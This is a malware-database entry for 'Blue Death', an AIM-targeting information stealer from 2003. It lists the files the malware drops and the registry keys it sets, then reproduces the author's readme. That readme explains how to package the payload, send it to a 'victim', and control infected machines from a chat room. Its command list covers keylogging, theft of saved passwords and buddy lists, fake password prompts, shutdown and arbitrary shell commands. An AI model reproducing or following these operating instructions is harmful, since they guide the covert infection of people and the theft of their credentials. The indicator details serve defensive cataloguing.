Blue Death

Released 21 years, 1 month ago. August 2003

By ?

Informations

Author	?
Family	Blue Death
Category	Information Stealer
Version	Blue Death
Released Date	Aug 2003, 21 years, 1 month ago.
Language	Visual Basic

Additional Information

dropped files:
c:\WINDOWS\system32\Microsoft.NET\abutton.dll     Size: 16 bytes 
c:\WINDOWS\system32\Microsoft.NET\desktop.ini     Size: 67 bytes 
c:\WINDOWS\system32\Microsoft.NET\msconfig.exe    Size: 106,496 bytes 

added to registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableTaskmgr"
data: 01, 00, 00, 00 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "msc"
data: C:\WINDOWS\System32\Microsoft.NET\msconfig.exe 



tested on Windows XP
March 21, 2006

Author Information / Description

-------------------------------------
|          Blue Death 3.0           |
-------------------------------------
|||||||||||||||||||||||||||||||||||||
| READ ME FIRST                     |
=====================================
*updates*
blocks ctrl alt del, dos,regedit :)
new commands more power
recoded someparts
added a uninstall file, u must restart your computer after doing runnin it
best the luck to yall

ADD.EXE is ok to run lets u add saved passwords to your signon screen
DO NOT RUN INSTALL ON UR SELF OR AXINSTALL or msconfig

i am not responsible for any crap u do with this program, it was for fun to keep my self busy.
steps
Open up setup folder DO NO RUN ANY FILES UNLESS THIS READ ME SAYS TOO
1)open up abutton.dll with notepad
2)replace "chatroomnamehere" with the chat room you want the "program" to make them join(u need this for the commands so remember it)
3)after you do that save the file
4)run Compile.exe it will take abutton.dll and msconfig.exe(the "program") and it will make one exe file called install.exe
5) you can rename install.exe to whatever you want. 
6) send install.exe to your victim after they run it, it will install the "program" and run it
7)wait about 20 or so seconds, and the "program" will join the chat room 
8)use aim:GoChat?exchange=16&roomname=chatroomname (replace chatroomname witht he one u put in the abutton.dll file) to join the chat.
9) say !screenID to get the "program" to respond with its ID
10)use the list of commands to do what you want

DO NOT RUN THE "program" ON YOUR SELF IM SICK OF TELLIN PPL HOW TO UNINSTALL
when i get time ill make a uninstaller for that

=====================================
| Command |          Action         |
=====================================
=====================================
!screenID | bot's return ID # for other commands
------------------------------------------------
Replace ID with the ID# you get above
!getKL ID | bot returns keylog of signon screen
!getSP5 ID | bot returns Screen names and saved passwords for 5.0+(not decrypted)
!getSP4 ID | bot returns screen names and saved passwords for 4.8-(decrypted)
!getBL ID | bot returns buddylist
!getSL ID | bot returns all Screennames on signon screen
!remove ID | uninstalls "program" improved from first version
!setE ID (emailhere)| sets Email, you still have to respond the the email it sends you and wait the 72 hours(chance of windowflicker)
!shutD ID | this will shutdown there computer
!openCD ID | opens all cd drives
!closeCD ID | closes all cd drives
!popP ID  | pops up a fake aim error tryin to get there password then will respond what they type in 
!popUp ID (websitehere) | pops up a website that you put between ( )
!popUpF ID (websitehere) | pops up 20 windows of the website that you put between ()
!away ID (awaymessage here) | sets a awaymessage 
!setHP ID (homepage) | set there IE homepage
!delSP ID |dels there saved passwords
!shellC ID (anything u can put in start/run)
============================================================
examples
===========================================================
!popUp 454 (www.crap.com) |makes bot with ID 454 open www.crap.com
!setE 454 (
[email protected]
) will change email to
[email protected]
*note only works if buddy list is open "program" will tell you if it did it or not*